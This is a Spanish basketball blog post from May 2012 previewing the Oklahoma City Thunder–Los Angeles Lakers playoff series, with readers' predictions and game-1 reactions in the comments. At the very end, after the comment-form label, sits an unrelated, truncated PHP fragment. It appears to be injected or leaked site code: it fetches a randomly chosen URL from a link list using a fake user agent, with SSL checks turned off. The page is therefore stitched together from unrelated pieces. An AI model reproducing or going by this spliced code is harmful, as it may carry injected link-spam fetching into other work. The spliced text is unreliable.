Oklahoma Thunder (2) vs Los Angeles Lakers (3)

14 de May de 2012 por TheDeerHunter

Regular: 2-1

Thunder: 103.1 PF – 96.9 PC
Lakers: 97.3 PF – 95.9 PC

Han pasado poco más de dos años desde el palmeo definitivo de Pau Gasol en el 6º choque de primera ronda que clasificó a los Lakers para lo que a la postre iba a terminar suponiendo el último anillo de la franquicia. Desde entonces han cambiado ciertas cosas. Los Thunder no son el equipo bisoño que pisaba por primera vez postemporada. Ahora son el equipo a batir según la inmensa mayoría de analistas. Derek Fisher defiende los colores rivales y se avecina una eliminatoria a cara de perro tras el brutal codazo de Artest a Harden en el reciente enfrentamiento de regular. El capítulo de agravios entre ambas franquicias no ha hecho más que comenzar.

Sorprende el abultado favoritismo pro-Thunder. Casi se diría que será un paseo en barca para ellos atendiendo a lo que se palpa por ahí. Personalmente no apostaría por ello. Será una eliminatoria dura e igualada, donde contará cada detalle. Ambos cuentan con medidas y contramedidas específicas para este duelo, pero también entra en juego una carga emotiva muy particular que bien puede suponer un desequilibrio significativo según cómo sea manejada. Por otro lado, tampoco sabemos qué versión vamos a ver de los amarillos.

Claves de la eliminatoria

– El peso de las piernas: Los Thunder llevan una semana descansando tras un cruce más fácil de la cuenta contra Dallas. Los Lakers ya han visto el abismo del 7º a vida o muerte contra Denver y por momentos han dado muestras de fatiga. En cualquier caso no siempre es evidente el efecto positivo de ese descanso. A los amarillos les ha dado tiempo a recuperar a Artest y a los Thunder a hacerse mala sangre.

– El control del ritmo: Los Lakers ya le han visto las orejas al lobo dejando correr a Denver. Los Thunder son tan peligrosos o más que los de Colorado en esta faceta, con el agravante de que éstos tienen más recursos para disputar el dominio de tableros.

– Los emparejamientos defensivos: Ibaka&Perkins sobre Pau&Bynum, Artest sobre Durant, Sefolosha sobre Kobe, éste sobre Westbrook… ¿Quién sobre Harden?

– El agujero Fisher: Por primera vez desde que tenemos uso de razón no se habla del teórico agujero que suponía Fisher como constante factor en contra de Lakers. De premio, Ty Lawson se ha cebado con ellos en primera ronda. El viejo pescador tiene incontables muescas en su rifle. Resultaría verdaderamente irónico que se haga una con su ex equipo.

Pronóstico

Lakers 3-4

Comenta

33 comentarios a esta entrada

  1. M dice:
    #1

    Creo que el principal problema para OKC será Mettaloquesea. Si Durant no es más agresivo y lo fía todo a su espectacular talento, su equipo puede encontrarse en problemas. Diría que, si eso sucede, no confío en Westbrook y su baloncesto impulsivo, pero después de ver ayer a Teodosic, creo que esa forma de entender el basket me da más confianza, al menos en el momento en el que escribo esto.

      Citar

  2. busky23 dice:
    #2

    Deer,ese pronostico lo haces como analista(con la cabeza),o como seguidor Laker (con el corazón)??

      Citar

  3. busky23 dice:
    #3

    Yo en esta eliminatoria tengo el corazón partido…por una parte tengo muchas ganas de ver a Durant y sus Thunder ganar un anillo y por otra me es imposible querer que los Lakers de Kobe y Pau queden eliminados…

    Yo pronostico un 4-1 para Thunders,aunque nunca se sabe q versión veremos de los amarillos

      Citar

  4. Esteban dice:
    #4

    si vemos el palizon quie le dio el thunder a dallas con un 4-0 y los lakers sufriendo como loco para un 4-3 frente a devner,m haria suponer una seruie facil para el thunder, si tengo q apostar mi dinero, apuesto a ello

    pero me da que los lakers no se van a rendir facil y ganaran algunos juegos, ya si superan la eliminatoria seria todo un batacazo

    hace un año con la llegada de perkins, y los lakers en la cumbre, el thiunder miraba a los angelinos y como deternos, asi se armaron de 4 bueno internos que le haran las cosas dificilisimas a bynum y gasol

    por lo pronto quiero ver cuanto puntos le deja hacer perkins a bynum, (perkins me parece un mulo, pura fuerza, pero eso deberia darle resultado frente a bynum)

      Citar

  5. TheDeerHunter dice:
    #5

    Yo cuando escribo un análisis intento ser lo más neutral posible. Otra cosa es que lo consiga, pero al menos todo el mundo sabe de antemano de que pie cojeo.

    Mi premisa es que la eliminatoria es extremadamente igualada y que se irá a 7. En ese panorama confío más en Lakers por su experiencia de campeón, pero en mi propia mente me la juego conmigo mismo a cara o cruz. A priori me parece casi una lotería.

      Citar

  6. Melo15 dice:
    #6

    Esteban Perkins mide 2’08 con, y Bynum 2’13 y tampoco creo que deba ser mas fuerte que Bynum y Pau le saca bastantes cm a Ibaka , en resumen en mi opinion los Lakers ganaran el juego interior mas la defensa de Metta, y la aportacion y veterania de Kobe y en general de todo el equipo la serie creo que se pone favorable a los angelinos.
    La Clave es jugar como jugaron contra Denver, balones a los interiores.

      Citar

  7. simon dice:
    #7

    Puff viendo los comentarios cualquiera diria que Durant es un don nadie y que “el imbecil” o Metta como querais llamarlo, lo va a parar facilmente, que la pareja Pau&Bynum van a arrasar a Perkins/Ibaka ( al igual que hicieron con la ultrapeligrosa pareja Faried&MCgee jo jo jo ) que Westbrook va a tener una mala serie debido a la defensa de Kobe ( lo mas probable ) que a este le va a quedar oxigeno y piernas para cascarse 40 puntos con… digamos 35 tiros esta bien no? y que Harden no va a salir si quiera a cancha por el miedo a otro codazo…
    Personalmente Thunder es uno de los equipos que mas me gustan y quisiera que ganaran el anillo pero por otro lado me gustaria ver a Lakers dar su ultimo coletazo ( con este proyecto ) tengo el corazon partio como ya ha dicho alguien por ahi.
    No obstante mi visión de la eliminatoria es bastante distinta a la generalizada por aqui, Creo que Metta puede molestar, que no parar a Durant, que Pau y Bynum van a tener una buena serie pero no van a aplastar por dentro ni mucho menos, sobre el papel son superiores a cualquier pareja interior de la liga pero no lo demuestran tan a menudo como necesitaria Lakers. Kobe va a parar a Westbrook, al menos en principio, pero creo que lo va a dejar sin oxigeno para atacar fresco, aparte de que un dia puede ser, pero estar dia si dia no enfrentandose a westbrook puede pesar si la serie se hace larga pues este no va a parar de hacer su juego. y Harden creo que va a salir ultra motivado y va a anotar mucho en esta serie. y por si fuera poco tienen a Fisher ahi para los momentos calientas + Sefolosha que es de los que mejor a defendido a Kobe siempre.
    Veo por lo menos un par de palizas de Thunder en esta serie.
    yo daria la serie 80% Thunder – 20% Lakers.
    Es que vamos si lakers se ha visto tan apurado contra Denver que es un mini-thunder. ( base rapido y electrico ) “westbrook y Lawson ) + alero anotador ( Durant y Gallo ) + interno super intenso ( Ibaka y Faried ) pero con muchiiiisima menos calidad en todas las lineas que Denver… no veo un escenario posible para que Lakers pueda pasar de ronda. Igualar y complicar algunos partidos e incluso la eliminatoria si, pero ganarla no lo veo. si ya me cuesta imaginar a lakers forzando el 7…

      Citar

  8. simon dice:
    #8

    El unico escenario en el que veo ganando a lakers es el siguiente.
    Lakers:
    – Juego interior arrollador
    – Kobe desatado ( y acertado )
    – Metta y Barnes anotando desde fuera + defendiendo a muerte a Durant
    – Session y Blake anotando mucho y defendiendo muy bien-
    – El banco aportando y mucho.

    Thunder:
    – Durant por debajo del 40%
    – Ibaka y Perkins tocados por faltas
    – Harden cohibido
    – Westbrook acelerado y fallón y sin asumir su rol de 2 o 3 opción.

    Demasiados condicionantes.

      Citar

  9. Nacho dice:
    #9

    Nadie veía al Olympiakos ganando la euroliga…
    Si hubiese otro entrenador en Lakers, el que sea, yo me jugaba mi dinero por los amarillos, pero…
    Aún así, pudiéndome el corazón, y en contra de lo claro -Brown sigue en Los Ángeles-, 2-4, 3-4 LAL.

      Citar

  10. Esteban dice:
    #10

    Melo, perkis es capaz de ponerse tan duro en su defensa de poste q hasta le costaba a howard llevarselo hasta el semicirculo, no creo q vayamos a ver a un bynum por ensima de los 20 puntos muy seguido

    Y metta le dara algunos problemas a durant, pero dudo q pueda secarlo

      Citar

  11. Blade Petrovic dice:
    #11

    Yo voy con los thunder y creo que pueden ganar.Espero que Durant se meriende a Meta y Westbrook se zampa a los bases de L.A.Mi final perfecto sería en el septimo partido un Buzzer-Beater de Fisher in the face of Brayant.

      Citar

  12. rumbero dice:
    #12

    4-2, 4-3 para Oklahoma, y me baso en la irregularidad que arrastran los Lakers. “Si juegan balones dentro….si Pau le echa un par de huevos…si Kobe no se tira 40 tiros….si son más consistentes fuera del Staples…” Si, cuando se ponen son un equipazo, pero lo cierto es que vienen de jugar un séptimo partido contra Denver. Los Thunder estaran más o menos inspirados, pero uno sabe como van a jugar. Con estos Lakers de Brown uno no sabe que versión puede tocar, y un par de pájaras contra Durántula y cia significa irse para casa. Esperemos que saquen su mejor cara porque puede ser un pedazo de eliminatoria. Durant y Kobe, un Harden con ganas de victoria para reirse en la cara de MettaViolence, el duelo Pau&Ibloka que nos venderan cada dia en el Marca…

      Citar

  13. simon dice:
    #13

    Nacho:
    Nadie veía al Olympiakos ganando la euroliga…
    Si hubiese otro entrenador en Lakers, el que sea, yo me jugaba mi dinero por los amarillos, pero…
    Aún así, pudiéndome el corazón, y en contra de lo claro -Brown sigue en Los Ángeles-, 2-4, 3-4 LAL.

    eso está claro, pero es que creo que el mayor inconveniente de Lakers en esta eliminatoria es que se tienen que dar muchos y si…y si… y si…
    Con otro entrenador mas coherente y un grupo mas enchufado yo veia a Lakers maximo favorito al anillo pero asi no… van demasiado al tran-tran…

      Citar

  14. tebias dice:
    #14

    Como ya he comentado en otros post, aparte de la importancia k tiene Durant y Westbrook, para mi quien puede marcar la direfenciaes Harden…

    Ahora eso sí, si Kobe esta en plan estelar y se mantiene unos cuantos partidos de ese modo, no hay ningún jugador en la cancha que este a su altura (ni Durant) ya sea por experiencia o por los recursos que tiene,los Lakers tendrán sus chances ene esta eliminatoria.

      Citar

  15. TheDeerHunter dice:
    #15

    En mi opinión, simon, si todos esos condicionantes que enumeran se cumplen sería una barrida para Lakers.

    En cuanto a otros comentarios Brown no me dice mucho como entrenador, pero Brooks tampoco es precisamente un águila.

    A partir de un rato iremos despejando dudas

      Citar

  16. MagicJohnson32 dice:
    #16

    Los Lakers deberían aprovechar el primer partido de la serie, sacar partido del prolongado descanso de los Thunder que puede causarles salir algo fríos. Creo que este game 1 supone a priori su mejor oportunidad de ganar en OKC.

      Citar

  17. simon dice:
    #17

    TheDeerHunter:
    En mi opinión, simon, si todos esos condicionantes que enumeran se cumplen sería una barrida para Lakers.

    En cuanto a otros comentarios Brown no me dice mucho como entrenador, pero Brooks tampoco es precisamente un águila.

    A partir de un rato iremos despejando dudas

    Bueno si ahora leyendo lo que he puesto quizás me pase poniendo condicionantes, si se da todo eso seria una paliza para Lakers hjejejejeje pero si que pienso que se deberian dar bastantes de esos condicionantes para que Lakers tuviera opciones.
    Yo apuesto un 4-1 o un 4-2 para OKC. pero tranquilos los aficionados de LAL que ya pronostique un 4-1 para Memphis y mira.. jajaja

      Citar

  18. Sancho88 dice:
    #18

    Hombre, yo ya dije que pensaba que pensaba que la eliminatoria iba a estar muy competida. A estas alturas las barridas por 4-0 o 4-1 son muy complicadas. Yo dije 4-3 para OKC y lo mantengo. En el Staples Lakers pueden tirar de corazón y orgullo y llevarse los partidos, pero fuera, fuera… es el eterno condicionante. Están jugando fatal fuera esta temporada, no han sido capaces de ganarles ningún partido fuera a Denver, y supongo Deer, que el escenario que tú imaginas es una serie en la que OKC va a ir dominando, siempre 1 o 2 juegos por delante, que Lakers neutralizará esa distancia en casa y que, finalmente, en el séptimo demuestran la experiencia en un partido agónico a vida o muerte…. Puede ser eh? No es descabellado. Yo veo séptimo en esta serie sí o sí, pero para ello Lakers tiene que estar infalible en casa, porque no creo que rasquen nada en Oklahoma. Por otra parte, lo de las machadas heroicas como la de Olympiakos o la de los propios Lakers al final de la Regular con aquella remontada precisamente sobre Thunder… hombre, te dan un partido o dos como mucho, no una eliminatoria entera a 7 partidos… Por eso yo pienso que si Oklahoma se mantiene en casa favorito como suelen hacer, con un ritmo de anotación al que no puede llegar Lakers porque se van a atascar, ya que Westbrook te va a llevar a un ritmo que tú no puedes defender… pueden llegar victorias fáciles de Thunder allí.

    Para mí, en esta serie la clave es el duelo Westbrook-Sessions y Fisher-Blake. Westrbook, aunque muchas veces nos mofemos de él por sus pérdidas, es el gran termómetro de los Thunder. Cuando está verdaderamente enchufado, olvídate. A ver si Sessions puede pararle. Harán falta ayudas, ya que va a penetrar. Creo que en esta eliminatoria será mucho más importante neutralizar a Westrbook que a Durant, y lo digo totalmente convencido.

    Pues eso, que Lakers tiene que jugar a tope en el Staples, no puede permitirse ningún fallo, y que Bryant ha de seguir como en el séptimo contra Nuggets, aportando en ataque toda su clase, pero distribuyendo juego e involucrando a Pau y Bynum. Sin ellos no podrá llegar a las finales ni de coña…

    Así que para mí las claves más importantes son esas: parar a Westbrook y que Bryant involucre a Pau y Bynum

      Citar

  19. Sancho88 dice:
    #19

    Totalmente de acuerdo Magic, podría ser la clave el primero de esta noche, porque Lakers pueden aprovechar el factor sorpresa. Thunder llevan toda la semana descansando y eso puede ser perjudicial a estas alturas del campeonato, y Lakers están a tope, después de una victoria fundamental el sábado, deben seguir por esa línea y jugar con la misma intensidad esta noche. Estoy muy de acuerdo en que tienen que aprovechar el favoritismo de Thunder y pegar hoy el gran golpe

      Citar

  20. Sancho88 dice:
    #20

    Bryant está teniendo muchos problemas en la marca de Westbrook… ahí van a sufrir mucho los Lakers. Bien Bryant por buscar no ser siempre la primera opción en ataque e implicar a los pívots y a Artest. Artest, cabeza loca aparte, está en un momento muy dulce de su carrera. Está siendo partidazo el primero

      Citar

  21. Sancho88 dice:
    #21

    Joder… vaya tela con el arbitraje, yo no entiendo nada. En la NBA no existen los pasos o qué? Vaya 2+1 de regalo que le han dado a Harden después de marcarse los cien metro lisos de Ato Boldon… No sé como dejan pitar a Brothers a estas alturas de temporada, es lamentable el pavo, incluso peor que Joey Crawford… mucho peor diría yo

      Citar

  22. Sancho88 dice:
    #22

    Lakers 15 abajo al descanso… vaya tela!! No pasa nada porque es el primer partido, pero desde luego ya se pueden hacer muchas lecturas. La ventaja de los Thunder llega gracias a los bloqueos directos de Perkins e Ibaka en ataque, nada más, en serio. Tan sencillo como eso. Lakers no está aprovechando ese juego dinámico de aleros, con los pívots haciendo labor de intendencia en ataque. Me da la sensación que a Brown le han llegado tantas críticas sobre la inutilización de sus pívots que ahora quiere hacer todo lo contrario, buscarles en todas las jugadas sin preocuparse de otras cosas. Está organizando más juego Artest que Sessions, al que efectivamente, como apuntabais hace algunos meses, se le quedan muy grandes ahora mismo unas semifinales de Playoffs… no tiene nivel. Pues eso, también como apuntabais no se si fuiste Magic, que Pau debería jugar organizando desde el poste bajo. Totalmente de acuerdo. De hecho, cuando se ha puesto ahí ha dado un par de asistencias para canastas fáciles debajo del aro. Bynum debe aprovechar mejor su cuerpo en ataque también. No solo vale con ponerse ahí para recibir y jugarse el 1×1, en el cual es buenísimo, sino que debe hacer algún bloqueo indirecto a Bryant. No sé, Lakers no tiene trabajado muy bien el ataque y Thunder está creciendo desde una defensa sencilla. De todas maneras, digo que esto es neutralizable, que perder de 15 puede parecer una desgracia pero tiene soluciones fácilmente aplicables, como por ejemplo en defensa subir un pistón la intensidad y dar un pasito adelante para sacar afuera a los interiores de Thunder y no dejarles maniobrar en el juego de bloqueos. Pau y Bynum deben estar más intenso en todas las facetas del juego.

      Citar

  23. Sancho88 dice:
    #23

    desde el poste alto, que diga

      Citar

  24. simon dice:
    #24

    bueno, Thunder dando la primera de als dos palizas que vaticine para este serie. me voy a dormir que aqui esta todo el pescado vendido. buenas noches.

      Citar

  25. Sancho88 dice:
    #25

    Kobe vs Wesbrook = Fail
    Sessions vs Westbrook = Absolutely Fail
    Ebanks vs Westbrook? = Posible solución

    Conclusiones de esta noche:

    1.Brown fuera nada más acabar la serie, es un insulto contra la inteligencia del aficionado medio al basket y, desde luego, hay grandes entrenadores que podrían coger el equipo con muchas más garantías que este tío.

    2. Sessions no merece jugar en Lakers. Que acabe la temporada y se pire, sería una locura renovarle el contrato. Bueno, como segundo base podría valer…

    3. Pau está perdido, desubicado, para nada integrado. Este no es el Pau que yo conocía… Si no está agusto en el equipo o si no viene otro entrenador que haga sistemas para integrarle en ataque, lógicamente el traspaso sería vital.

      Citar

  26. Sancho88 dice:
    #26

    Lo creais o no, ha vuelto a ocurrir.. codazo de Artest a Harden. A ver, ha sido mucho más light, pero le ha dado en la cara… unbeliveable…

      Citar

  27. simon dice:
    #27

    Llevo toda la temporada pensando que lo mejor para Lakers era quedarse con Pau, pues con su contrato iba a tener que absorber muchas cosas por el y podia ser perjudicial o bien podian tradearlo por u n jugador con contrato similiar, que obviamente esos equipos no iban a querer traspasar a su superestrella por Pau, bueno si, Atlanta si pero vamos que no veia ningun traspaso que terminara de mejorar a Lakers por eso pensaba que Pau se iba a quedar aun bastante tiempo en los Angeles. Viendo los PO, pienso que lo mejor seria que Lakers este verano lo traspasara, sea por lo que sea, pero Pau debe de salir de los Angeles, por el bien de Lakers, Pau ahi ya no pinta nada y por el bien de Pau, que si no va a terminar convirtiendose en el jugador gris y mediocre que vemos noche tras noche, desmotivado y sin rumbo. Si continuan mucho tiempo juntos van a terminar haciendose daño los unos a los otros…

      Citar

  28. TheDeerHunter dice:
    #28

    Oye simon… he observado que el sistema te marca como spam en ocasiones ¿te ocurre muy a menudo?

      Citar

  29. nba dice:
    #29

    La unica manera de que Lakers tenga alguna opcion es:
    -Que Brown salga con este quinteto inicial: Barnes-Bryant-MWP-Gasol-Bynum,
    aprovechando los problemas fisicos de Perkins, percutir una y otra vez en el juego interior, intentanto provocar
    faltas de los jugadores interiores de OKC, forzando a sus jugadores exteriores(Durant-Sefo) a ir a las ayudas en defensa.
    Cuando Pau lleve mas de 5 minutos en pista, mandar a Bynum al banquillo y que Pau pase a jugar de 5 , a la vez que manda a Barnes al banquillo, sacando esta a Sessions, ya que la labor de Barnes debe de ser desde el comienzo desquiciar a WestBrook, tal como hacer Sefo con Bryant.
    Y no queda otra que mover la rotación intentando mantener frescos a su big-four .

      Citar

  30. Sancho88 dice:
    #30

    El agujerazo está en el Westbrook-Sessions… a ver cómo lo resuelven

      Citar

  31. simon dice:
    #31

    TheDeerHunter:
    Oye simon… he observado que el sistema te marca como spam en ocasiones ¿te ocurre muy a menudo?

    La verdad me pasa ultimamente a menudo que cuando voy a comentar, no me deja comentar, ayer mismo quise comentar aqui lo tuve que enviar como 4 veces el mensaje que sale como el #17, no se por que será, no se si es por el correo o que será. en realidad ese correo solo lo utilizo para registrarme en paginas y foros ( por ejemplo, Marca, Tuenti, Facebook etc… ) precisamente para proteger el que uso de spam etc… si pongo el otro se solucionara? El correo aqui se usa solo para temas de posibles baneos y tal no?

      Citar

  32. TheDeerHunter dice:
    #32

    intentalo con el otro, si quieres
    aunque de momento no tengo ni idea de porqué te sucede

      Citar

  33. GreenPride dice:
    #33

    Bueno pues esta es la eliminatoria que más apetece ver por muchas razones.
    Llego después del primer partido con la paliza de los Thunder aún fresca y aún así pienso que si los Lakers se ponen las pilas podría ser una serie larga.
    Para hablar de esta serie creo que hay 2 claves:
    1) Juego interior y ataque de los Lakers: Nos duele la boca a todos de decir que los Lakers deben meter balones a Pau y Bynum y en esta eliminatoria no es ninguna excepción. Con Perkins medio lesionado más aún. Los Thunder tiene 4 interiores para rotar sobre ellos, la mayoría buenos defensores e intensos pero aún así creo que los pivots de los de LA son superiores. Es clave para ellos que su ataque sea inside-out, primer pase a dentro y luego jugar desde ahí aprovechando si hay ayudas (de momento los Thunder se la juegan sin ayudar). A partir de ahí crear tiros o doblar balones para fuera. Kobe debe entender que esta es su única opción e intentar aprovechar y jugar 2×2 también con ellos, sobre todo con Pau que es mejor que Bynum en el pick and pop (es increíble lo poco que utilizan esta opción). Además Kobe tiene que saber dosificarse porque en defensa se le va a necesitar muchísimo.
    2) ¿Como defender a Westbrook-Harden? y las piernas de los Thunder: La gran ventaja de los Thunder está cuando Westbrook y Harden juegan juntos. Kobe sólo puede defender a uno de ellos lo que además le desgasta para el ataque pero ni Sessions ni Blake son defensores a la altura de para al que no defienda Kobe como ya hemos visto en el primer partido. Barnes es demasiado lento y Artes también y además a este le necesitan tratando de defender a Durantula. Difícil papeleta, quizás podrían intentar defender a ratos en zona, estilo los Mavs el año pasado pero no parece que Brown sea capaz de esto así que yo me la jugaría con Sessions sobre Harden y muchas ayudas de los pivots aprovechando que los pivots Thunder no son buenos en ataque. Además, los pivots Laker no pueden hundirse en la defensa del Pick&Roll como hicieron en el primer partido, cosa que aprovechó sobremanera Westbrook para machacarles. Además está el tema de las piernas jóvenes de los Thunder. Es un equipo con mucha hambre y piernas frescas y esto podría matar a los Lakers. Estos deben defender a muerte y apretar en el rebote para bajar el ritmo de los partidos y evitar que los Thunder se lancen a campo abierto.
    Si los Lakers consiguen defender decentemente y bajar el ritmo creo que serán unas series largas y se puede llegar al 7º, si no los Thunder pueden acabar con ellos en 5. Yo sinceramente no me atrevo a apostar, aunque como es un juego hacerlo voy a decir Thunder en 6

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>